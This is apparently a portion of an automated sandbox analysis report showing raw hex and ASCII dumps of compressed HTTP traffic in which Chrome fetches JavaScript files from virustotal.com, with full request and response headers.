                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1319INData Raw: 5a 9b 72 0c 7d d4 13 82 e8 43 63 70 27 24 5f 3f 55 cd 67 30 d1 56 5b 0b 26 90 94 8d f8 94 5a 6d f3 af 0d d7 d9 67 ae 05 4b 2d 10 5a 1f 0e ae bb 7b fa 15 66 f5 aa a8 33 84 c3 88 e5 21 90 61 73 61 6f db 7a 17 b3 7b 7f af fd 5e dc e9 07 77 58 ba 13 a9 6b d1 da a1 9c 46 08 61 25 bb db 48 29 97 c0 f9 53 1b 6e 86 5f 09 36 c3 83 06 f4 e2 4e b1 74 5e b2 53 be b4 2f 94 4f b4 12 1f 04 cd 33 08 e7 09 7a 95 b2 03 4c c3 72 88 a9 6c 73 ba e0 94 dc 8b 74 f4 f7 31 e3 1d 61 fc 7e 97 3b 3d a7 6a 1b f4 cf f0 24 58 df 0c 53 8d 34 53 d5 ac 5b f3 55 35 3a 12 28 c5 87 35 2f 7b 39 7d 88 af aa 4a 50 32 a4 ac 15 ee 5e 07 58 2b e8 95 a8 c9 76 58 eb da 7d 0e 96 bb 0e a3 04 40 d9 c3 c4 f7 30 5a e9 97 b3 a3 bf 80 1e 29 e8 80 66 b0 94 79 7e c6 e9 4e 44 3c d9 b0 ca 09 ed 30 94 1f 15 41
                                                                                                                                                                                                                    Data Ascii: Zr}Ccp'$_?Ug0V[&ZmgK-Z{f3!asaoz{^wXkFa%H)Sn_6Nt^S/O3zLrlst1a~;=j$XS4S[U5:(5/{9}JP2^X+vX}@0Z)fy~ND<0A
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 2a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 12 0d 0a 30 30 30 30 30 30 30 31 0d 0a 07 0d 0a 30 30 30 30 30 30 30 31 0d 0a f5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 07 0d 0a 30 30 30 30 30 30 30 31 0d 0a 79 0d 0a 30 30 30 30 30 30 30 31 0d 0a aa 0d 0a 30 30 30 31 0d 0a e4 0d 0a 30 66 66 37 0d 0a 14 bc 8e e9 e0 fe ae 74 70 cc 3e e5 bc 4d 73 d7 5c 23 77 0d a8 a2 43 27 c6 1f e8 95 f9 12 3a c4 d4 3e a3 71 e5 b2 7c 59 be df a6 07 ca 7c 7c 8b a5 aa b5 ec 2a 62 a4 51 aa f2 5c d3 34 0d 54 1e 4e 7f 93 8b ba ba 63 fa 1b 91 83 f3 96 72 65 8a d6 ca 78 25 d6 8d b0 61 68 81 b0 d4 fa a3 44 3d d2 9a 47 a3 ff 07 4e 49 49 0a b6 af cd c4 47 8f 1a 07 c6 3b c2 dc 53 e5 19 64 f7 77 94 0c 5e 7b eb f4 39 2d 04 a9 e6 23
                                                                                                                                                                                                                    Data Ascii: 00000001*00000001000000010000000100000001>0000000100000001y0000000100010ff7tp>Ms\#wC':>q|Y||*bQ\4TNcrex%ahD=GNIIG;Sdw^{9-#
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 40 5c c8 74 06 c8 b0 07 5c 58 39 3f 33 fd e7 7b a6 ff 54 b1 95 2a 58 2c 40 a2 36 b8 c4 2b ff 12 54 92 04 8a 6e 89 15 21 ec a3 af 82 93 8f b0 3d 06 61 ea 9c 6f 35 9d f2 24 cd 4c a1 fc 8a 32 86 c7 39 f2 a4 a2 82 25 25 7b 5b 7a 70 41 56 01 62 bb e1 9d 6e 28 19 b8 cc cf a7 85 b4 af 66 cd 24 0e 29 6b 92 9e 0a 26 e3 45 11 9e c2 c6 4a a2 d2 70 cc 40 15 97 ca 1d 5d d4 23 0e 45 7d 4b 07 48 9e b1 a7 bc 3e 07 55 e0 56 04 5b d3 7b 31 35 ad e4 e0 aa 6c 05 6f 6d 73 53 ae a7 cc 46 f0 85 5a b9 21 c8 e1 ce a4 16 db 56 45 2b 7e c8 2a 40 31 fa d0 75 0c 4c 1c 65 72 3c a9 1c 55 ca 0a a0 33 4f ad 68 25 c8 32 4b 41 97 0f 03 42 7d 20 c9 9f 94 9a 5e dd d9 d0 ed f7 5b 3a fd 53 7a 67 43 76 63 c3 fc a8 a2 fb 9d 52 15 2d 0b a9 8a 98 62 9a 0a 93 bf 23 67 34 b9 57 7a c4 c7 b1 e0 3d 78
                                                                                                                                                                                                                    Data Ascii: @\t\X9?3{T*X,@6+Tn!=ao5$L29%%{[zpAVbn(f$)k&EJp@]#E}KH>UV[{15lomsSFZ!VE+~*@1uLer<U3Oh%2KAB} ^[:SzgCvcR-b#g4Wz=x
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1392INData Raw: 8d 00 b2 5f bf d1 e5 3d 94 70 32 44 12 70 71 27 ec d7 7b 74 67 84 db 22 a4 c2 36 cc da 2a 5d b7 24 de 66 ba 6e ed 8d 48 1f 47 2d 23 4e d8 90 48 ac ac a6 44 44 ba 3b e2 29 6e b9 6c 88 46 a4 8d 6b 17 90 70 5b 02 02 71 65 65 75 59 dd 54 67 d5 eb ea 5d 55 1c 14 0b ae 89 e7 f4 e4 4a 6d f1 99 fb 98 38 8f 49 52 78 28 f0 e5 13 7b c6 f8 73 f9 5b fc f8 fc 39 2b cd 26 48 eb 4c 82 19 ff 8c 88 3e 2c c1 36 ab 22 d9 60 f3 e6 69 1c 1c 4f 39 9a 21 58 dd b8 9c 01 49 a1 17 0c 23 64 1a 40 9e 81 a7 4f cd 6f e4 18 48 0f eb c6 fb 4c 25 e7 06 3c 91 6a 61 81 6c 22 c8 6a fe 08 fe 86 f0 af 47 51 3a 93 a6 ee 69 30 95 33 b7 75 95 57 f1 60 70 78 ad 1c f0 e0 c7 07 da 1e 99 68 29 34 d2 50 5a 69 3a 30 9e 3e c2 c5 2d f0 a2 0b 94 8f 1b 5c fe 24 9d 37 f6 61 19 ae c0 bc 7a 14 61 16 74 15 c3
                                                                                                                                                                                                                    Data Ascii: _=p2Dpq'{tg"6*]$fnHG-#NHDD;)nlFkp[qeeuYTg]UJm8IRx({s[9+&HL>,6"`iO9!XI#d@OoHL%<jal"jGQ:i03uW`pxh)4PZi:0>-\$7azat


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    130192.168.2.164988274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC688OUTGET /gui/9234.4895d7a797c4dbf3a58b.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 83eb5bc04a698c83a1a8206077273cb9
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:38:39 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:38:39 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 37009
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 31 0d 0a 00 0d 0a 30 66 66 63 0d 0a 00 00 00 00 02 ff ec 7d 6b 77 db 46 d2 e6 f7 fd 15 30 93 f1 4b 66 00 98 17 51 12 29 d3 8e 23 3b 33 3e 6b 8f e7 58 ce bc 7b c6 e3 e3 80 64 53 44 4c 02 7c 01 50 97 a1 f9 df f7 a9 aa 6e a0 01 82 92 12 79 f6 c3 1e 45 b1 4d f5 a5 ba bb ba ba ee dd 6c ac 53 e5 a4 59 12 4e b2 c6 49 33 55 8b 99 7f a9 c6 ab 60 f2 e5 74 be 8e be 5c 64 9f d7 e1 e7 65 10 46 a3 1b ea be 7e fd f8 a9 e5 af d6 e9 bc f9 f1 e3 a0 db 3b f8 e4 6e 0e 06 dd f6 d1 b0 a9 dc cc 4d 5a a3 67 9b a4 d9 39 ea 1c b7 4e 2e 82 c4 89 47 49 f3 a8 7f 3c 18 b4 dc 94 3e b6 0f 7b fd 96 1b e2 63 bf 3b 18 b4 5b 6e 30 6a 52 fb e3 83 a3 96 9b 34 8f 0f fb fd 83 56
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000110ffc}kwF0KfQ)#;3>kX{dSDL|PnyEMlSYNI3U`t\deF~;nMZg9N.GI<>{c;[n0jR4V
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 3d 68 d6 89 61 92 b2 88 6d df 09 c0 f1 38 04 f5 59 f4 54 a2 c4 a9 f0 ba 82 16 85 8e 41 73 01 b8 25 68 f7 03 f8 f2 cb f8 32 7a 0f 86 96 d1 5a 77 59 67 fd 02 a6 58 c0 b4 ba 00 c3 0c 02 61 ba 05 bb 08 c6 69 bc c0 49 73 c6 e7 de 38 9e 5e 9b 13 0d 9e e2 b5 9d 71 9c 65 f1 12 1f c0 97 bc 76 e5 30 69 58 bb 4b 68 b5 b6 db 13 28 01 c0 6a ea af b4 ac c4 e9 21 79 38 3c c3 d1 8e ce b7 ad 4f ee 9a ea b2 98 4a dd 86 21 ae 86 7b 11 87 53 07 d2 7f 1f 80 17 49 12 5c ef f4 b7 76 fa 76 10 3f c5 f1 42 05 d1 0e 10 4b 2c fd 71 20 b9 1c 2b 40 ac 47 66 31 93 75 0a 84 6a 69 d9 6a 36 84 ab 4d b0 df d3 34 5e 27 13 35 f5 92 35 c4 04 73 6d c2 51 6b eb b2 5a 63 eb 50 fe 14 22 79 93 0e 9b d0 a8 d6 5b 08 f1 7b 28 55 dd e3 de 61 4b 74 a6 c8 5d b8 5a 6f 72 e7 85 e6 b4 76 2f 1e 74 a7 6f a0
                                                                                                                                                                                                                    Data Ascii: =ham8YTAs%h2zZwYgXaiIs8^qev0iXKh(j!y8<OJ!{SI\vv?BK,q +@Gf1ujij6M4^'55smQkZcP"y[{(UaKt]Zorv/to
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 25 3e 1e 23 6e a0 25 ce 17 f7 7b f7 bd fb d2 fd e0 be 76 4f dd 33 f7 85 fb d6 fd c9 fd ec fe e6 be 72 df b9 7f 29 24 d1 cf 0f 92 e8 1b 49 a2 37 15 49 74 ed 9f dd 35 08 90 aa 20 99 cc cf 10 65 82 31 30 89 17 74 ce e1 4a d5 5c 8c dd 20 a7 01 5c d8 b0 60 85 b1 a5 4a bd 40 40 c6 04 0c b4 4f eb 43 fc 12 3a e3 02 02 cc b4 9b 26 c1 a5 4a de c6 53 c0 25 30 8d 9b e5 5a 6a bb e1 3f 5e 41 ae 5d b2 5c 5b af 60 b1 a8 29 99 eb 74 cc 28 7a 12 bb 29 c2 63 14 d5 f0 8b 5a f7 91 f2 e1 44 6d 36 02 7d 3a 1b 88 ad e8 d0 11 54 66 66 d1 a6 0a 35 22 15 c9 08 28 b5 f2 79 c1 95 fa 47 99 8e f1 7c fd aa 28 f6 64 8f f1 f8 71 09 b2 f4 d7 cd 01 bd 69 66 90 20 50 54 e9 ba 3b 56 f2 5c a6 35 4c 34 04 4c 84 c1 4f 68 07 de 93 4b aa 59 33 1c 9c d6 7a ed 65 85 16 bd 77 70 82 98 14 4d 09 46 40
                                                                                                                                                                                                                    Data Ascii: %>#n%{vO3r)$I7It5 e10tJ\ \`J@@OC:&JS%0Zj?^A]\[`)t(z)cZDm6}:Tff5"(yG|(dqif PT;V\5L4LOhKY3zewpMF@
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC277INData Raw: 0c da 37 93 24 63 2c 58 71 dc 86 f2 67 88 40 c9 7f 46 56 9a 0e d0 99 6c 1e 7b 0b 75 e4 da 38 97 91 c6 53 c4 de 0c 64 a3 04 81 27 40 4d 33 a5 3f 62 8e f8 d5 b8 f5 75 f1 de a1 2d 2f 9f 16 12 14 b3 a3 c4 1e ed 93 b3 1a 68 e5 d9 93 64 85 86 f3 1c 31 fe a9 02 ee 39 fc 83 21 24 02 af 5d 80 94 94 e4 f8 63 85 73 ad 88 75 91 e3 2c 9f 24 7b b6 4c c7 33 a5 1c 28 e5 26 2f a9 ea 04 34 7e 3d 3e b9 48 31 da 1b e7 37 d8 22 ff 61 b9 71 41 42 a8 a3 15 55 a7 ce f1 26 3b fd e9 a6 06 f0 15 36 4e ad f3 a6 a9 8b d9 3d b4 44 3e 05 96 da 58 22 74 a6 0f 2d 90 b4 12 2b fb 07 eb cf 68 83 a5 72 f0 4d 89 cb 08 d3 44 fc c5 a8 46 5a 8c d8 f6 99 6d fe 28 a3 1e 15 8c 57 6c 6f 7d 00 ad 13 f7 3d 4e dc f7 7c e2 ac dd 36 e4 80 85 92 df 75 2f d6 51 0f aa c7 f1 a1 f4 42 b3 c1 79 da 19 9f 4d 09
                                                                                                                                                                                                                    Data Ascii: 7$c,Xqg@FVl{u8Sd'@M3?bu-/hd19!$]csu,${L3(&/4~=>H17"aqABU&;6N=D>X"t-+hrMDFZm(Wlo}=N|6u/QByM
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 69 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3e 0d 0a 30 30 30 30 30 30 30 31 0d 0a c6 0d 0a 30 30 30 30 30 30 30 31 0d 0a b9 0d 0a 30 30 30 66 66 63 0d 0a 2c 0c de 62 02 39 cd d6 74 36 09 36 a6 b3 71 46 53 7a 5b 14 5f 26 c1 aa 58 a4 4d c0 3f da 94 2a 61 57 12 78 1e d4 4b 93 61 57 4b e2 c0 18 4f bd 4a 47 ff 30 26 c4 0e 8d 1a b2 cf 43 9f 3b 2d 6a 18 04 90 4f d4 8e 6d 63 c7 b0 b6 bf 61 41 e7 89 80 ae 84 a9 3f 2f c8 54 42 fa 19 91 93 64 da 62 6b b4 6a c0 99 92 44 be 1f 28 a7 0f 42 1b 00 76 5a 19 03 8a 82 7d 91 1f ce 10 b3 44 a8 60 da 12 eb d2 9d fa ea 5a d2 46 ed 01 01 a8 f0 46 69 49 76 0a 63 25 7b de 68 50 90 d9 f0 fc f7 a0 c0 f7 16 cf ff 8f 6f 81 a6 ee 1d 1c 9b 5d 30 f1 00 5a b5 9e f7 9e 85 cf 41 fc e4 7c d3 ad 88 cd 95 70 2e 07 96
                                                                                                                                                                                                                    Data Ascii: 00000001i00000001>0000000100000001000ffc,b9t66qFSz[_&XM?*aWxKaWKOJG0&C;-jOmcaA?/TBdbkjD(BvZ}D`ZFFiIvc%{hPo]0ZA|p.
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: f9 48 41 9b 37 5c 36 12 ce b6 33 2f 8b d1 e2 1a 4c d1 3a 2a e6 65 37 31 fc 2f ca a3 4c 96 5d f4 0a d3 7b b5 6f 7a e2 df b4 35 35 63 03 d7 c6 b3 f8 62 88 05 fb 1d 60 bf 03 6c 44 e4 0d c2 24 b6 fa 2b 05 e3 b7 27 3f 73 52 66 48 c9 96 7c cf dd dc dd 93 c0 16 25 62 be b1 13 31 4d 40 a4 48 81 dc 07 a0 48 c5 2c 01 b0 82 34 7f 18 46 c9 01 fd 87 a1 18 57 d0 2e 80 22 25 bf 34 75 db 93 7d e7 4e c4 30 25 82 7f e7 2e 12 ef be 73 73 1a 21 e7 47 77 ee 55 25 e8 3b 77 d4 c8 27 0d 0c f9 48 79 4e ad 21 83 3d b8 13 93 91 f2 f4 76 bb 20 f9 24 b9 c6 05 c9 ef aa f6 66 95 f8 68 a5 a2 0d dc 06 e4 ad 04 25 75 e3 2a 1c bd f6 db 40 e1 a8 ca b5 7a 89 38 ed 81 f2 81 c3 51 3b 78 c8 17 65 5b 39 55 10 54 f7 4a 0c a0 1c c0 9b 91 41 e5 9e 94 62 ca 9f 2a c2 37 04 12 39 c5 7c 2d c3 4a 2a 36
                                                                                                                                                                                                                    Data Ascii: HA7\63/L:*e71/L]{oz55cb`lD$+'?sRfH|%b1M@HH,4FW."%4u}N0%.ss!GwU%;w'HyN!=v $fh%u*@z8Q;xe[9UTJAb*79|-J*6
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1338INData Raw: bd 16 e0 fd 3c b2 02 fd ae 84 47 94 5b 8a 25 0a 1a ab 0a 8f e8 6e a4 41 71 07 b8 06 b5 40 63 04 b0 99 24 4a ef 9a 5e 01 99 e0 2e 8d 6e 6a 38 59 c4 81 40 01 5e d2 b9 e8 59 12 bb 2d b6 8d 9d cf a9 b4 2d 1d 4d 48 cd ba a6 f5 53 86 d5 92 85 25 66 ec 38 35 0a 6b 45 c6 8b ed 4b 56 b0 65 27 17 f6 6f 9b f5 f2 9c 2d 79 e9 7a 89 19 5e f3 fb 79 4e 8e f3 9c 13 09 2f c9 0d f2 7d 52 a8 ac 4e 16 d0 f3 d4 f3 fa 15 96 b5 3a 0e db d8 e1 7a 0b d9 b7 cb ae 5d 6c d1 34 c8 9d e3 e9 54 e8 4d a1 bf d0 1b 87 43 47 18 aa 03 a7 65 59 cf bf 01 94 e4 c6 c8 c4 2e e7 10 f5 1e 5b 9f a4 2f 53 02 25 36 17 b2 28 37 fe 45 3b e5 42 26 b3 a2 46 2d 70 b9 02 37 af b9 6e 19 5c 19 79 d6 ed 1b 8c 57 25 95 d1 64 1c 07 e0 f9 d9 4a 73 6c c5 f5 00 48 b4 e0 14 b9 db ca 42 9c b1 0c 34 95 1a 05 ce a8 1d
                                                                                                                                                                                                                    Data Ascii: <G[%nAq@c$J^.nj8Y@^Y--MHS%f85kEKVe'o-yz^yN/}RN:z]l4TMCGeY.[/S%6(7E;B&F-p7n\yW%dJslHB4
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 61 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 87 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a c3 0d 0a 30 30 30 30 30 30 30 31 0d 0a c9 0d 0a 30 30 30 30 30 30 30 31 0d 0a b1 0d 0a 30 30 30 30 30 30 30 31 0d 0a c6 0d 0a 30 30 30 30 30 30 30 31 0d 0a 46 0d 0a 30 30 30 30 30 30 30 31 0d 0a b9 0d 0a 30 31 0d 0a 52 0d 0a 61 38 62 0d 0a 60 0c 8e 21 4f da f4 97 11 1a 79 2b 9e 81 9a 28 35 ab f6 cf d1 47 b8 ee f6 d0 bb 6b 30 4e 41 45 44 c6 0c f6 8c 11 c2 64 84 cd fd 62 2a 4a db 58 54 c8 a4 aa db c8 f5 3b 71 8d 02 26 c7 47 72 c8 b6 9c e7 9e 56 b5 c0 df 11 ce ec aa 32 9b 66 eb 73 b9 65 9d 43 b7 c9 af a8 95 dd 52 b3 b1 d2 1b a1 59 a7 f1 6d c1 21 a1 4f 12 fb 08 b4 9d cd 4e 84
                                                                                                                                                                                                                    Data Ascii: 00000001a0000000100000001000000010000000100000001000000010000000100000001F0000000101Ra8b`!Oy+(5Gk0NAEDdb*JXT;q&GrV2fseCRYm!ON
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: c5 78 c7 4e 58 a1 ad 44 1d 1e e2 2e b9 bf 14 81 92 c2 96 b0 3d b3 a6 e2 21 ee 42 e1 f9 87 b8 0b dd ec 7b 88 bb 94 2c 08 c8 de 87 b8 8b 38 15 c5 a3 a3 e3 31 0f 71 17 13 1c 32 d2 27 0f cb e4 b6 f7 43 dc e5 0f c6 5d d6 0b e3 54 f3 f8 4a 07 05 0c b7 28 b4 12 ba db f0 c1 d2 75 28 1c 56 be 60 c5 7e 68 dc 94 2a 5a 19 df e5 36 d0 6e 86 b2 6f ab cc e7 6c d7 07 d7 e8 4d 44 0c 1c 09 0f e2 b6 c8 23 12 12 7e 08 c4 f2 17 97 4b 19 9a 15 c5 e4 8a 4a b0 b9 b5 0d f8 fe c5 47 7a 83 e8 53 4b 3e f3 db 5c b8 a8 b9 bf 4a 8f 27 4e 0f 13 b1 a8 9d da 43 dc 4a c7 d7 1e e2 56 ff 9f c7 ad 7c 7c cd af 9c 40 fa be 5f 3e 6c e6 2a 38 bd 26 00 be 21 ec 79 a7 16 f9 4a 76 06 43 5e cf 8a b2 d1 87 91 7e 5a e9 2e 87 af 70 85 17 09 38 5c a3 55 ee 1c 9a 75 f0 2d 9e a0 13 ee aa 8d 11 34 a2 c7 26
                                                                                                                                                                                                                    Data Ascii: xNXD.=!B{,81q2'C]TJ(u(V`~h*Z6nolMD#~KJGzSK>\J'NCJV||@_>l*8&!yJvC^~Z.p8\Uu-4&
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC27INData Raw: ff 78 ec ff 96 22 15 7c f5 7f 01 00 00 ff ff 03 00 60 2e 62 44 87 9f 00 00 0d 0a
                                                                                                                                                                                                                    Data Ascii: x"|`.bD


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    131192.168.2.164988174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC689OUTGET /gui/36619.68cafafc7df311d6c6b7.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 8ff69ff327cde7550442024ada23ae60
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:48:53 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:48:53 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36395
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a bc 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a 36 0d 0a 30 30 30 30 30 30 30 31 0d 0a 96 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7f 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001\00000001{00000001w0000000100000001600000001000000010000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: fc 30 98 fc 11 54 d3 e2 e6 9d 5c d7 c7 a6 ca 20 4d 5e 09 d1 8f 3d 25 2f 93 c3 c3 49 90 c6 cf b3 e0 97 1f 48 f9 df b0 38 2d a1 cc bf 95 99 db 98 85 79 9c 86 39 57 4b 81 35 00 f5 06 9a 4e 57 f3 f4 ba e0 fb 87 56 2c 2c a3 69 c3 d0 54 c2 7a c2 e2 d4 94 86 45 d1 b2 ed 6b a9 8d c0 b7 98 f1 30 cd 58 7c 75 a7 f8 46 9a f5 11 24 64 2e 38 6f 71 6d 06 ae cd fe 3d ae 35 d9 6c 3e 0d ab b4 fa 32 ec 9b ef 32 c8 90 1b d6 13 b6 af 2a 16 65 c4 f6 53 57 33 e6 9d d0 ee 17 42 b9 1b 3e ec 47 7c 7b cb 02 12 00 6f b0 97 a3 92 9e 62 c0 16 3c 46 8b 71 9e e7 ad d7 7e 14 54 7c 99 b1 6a 24 88 ba c8 ab 30 61 2f df be f5 dc 38 f8 dd f3 23 6f 08 8f 87 ae 34 98 2b 4f e1 b9 2b f2 06 03 69 60 d7 de a5 3f a7 3e 5e 50 ab df b0 2c 62 c3 97 66 c6 83 d1 d2 b3 44 8b 8a 17 33 65 60 3d d7 06 6f f2
                                                                                                                                                                                                                    Data Ascii: 0T\ M^=%/IH8-y9WK5NWV,,iTzEk0X|uF$d.8oqm=5l>22*eSW3B>G|{ob<Fq~T|j$0a/8#o4+O+i`?>^P,bfD3e`=o
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: f3 3b e8 95 ce f5 80 9a 56 06 d8 a2 53 0d 67 68 74 fe ab 9a b3 a6 8f 84 92 98 08 fa 5c b3 ea 5d 41 f3 c9 36 49 1c 34 8a 60 51 2c 8d 9d be 65 0c 91 21 41 91 66 56 f8 0b 31 a3 23 e7 92 5b 3d ff d5 6c 13 8f 8d b5 5b 20 8e 2e 46 2b 04 01 26 3f 42 e6 41 1c d7 57 e5 02 a7 18 e4 b4 44 ca 2a a2 5c 08 c2 55 18 5a 64 b3 54 b8 b4 a2 63 cf 80 f9 02 72 c0 fd 2c 9d a5 7c d0 6e b5 fc 19 c5 55 57 85 18 7a 25 4e 37 b9 cf 72 0a 52 63 44 cf 3e 1d 4c 06 17 8d 70 c1 8b 09 cb 29 fe c7 11 01 d1 33 28 25 1d 0f 56 22 6f 85 84 50 34 2d 60 ad 7f 62 f9 c2 28 de 05 dc 3f c5 dc c5 8e 51 f2 a7 2c 44 5c 3c 20 0a 54 46 e9 48 8d 52 04 47 f0 6a 22 25 87 dc d2 a0 f1 73 c1 d3 64 89 f8 d7 41 1a 8e 21 8d 00 13 b2 10 0e cf 50 2f 56 c6 8d c6 13 2e d2 c6 ac 7d b3 bc e4 86 16 11 61 16 0d 06 4a 8e
                                                                                                                                                                                                                    Data Ascii: ;VSght\]A6I4`Q,e!AfV1#[=l[ .F+&?BAWD*\UZdTcr,|nUWz%N7rRcD>Lp)3(%V"oP4-`b(?Q,D\< TFHRGj"%sdA!P/V.}aJ
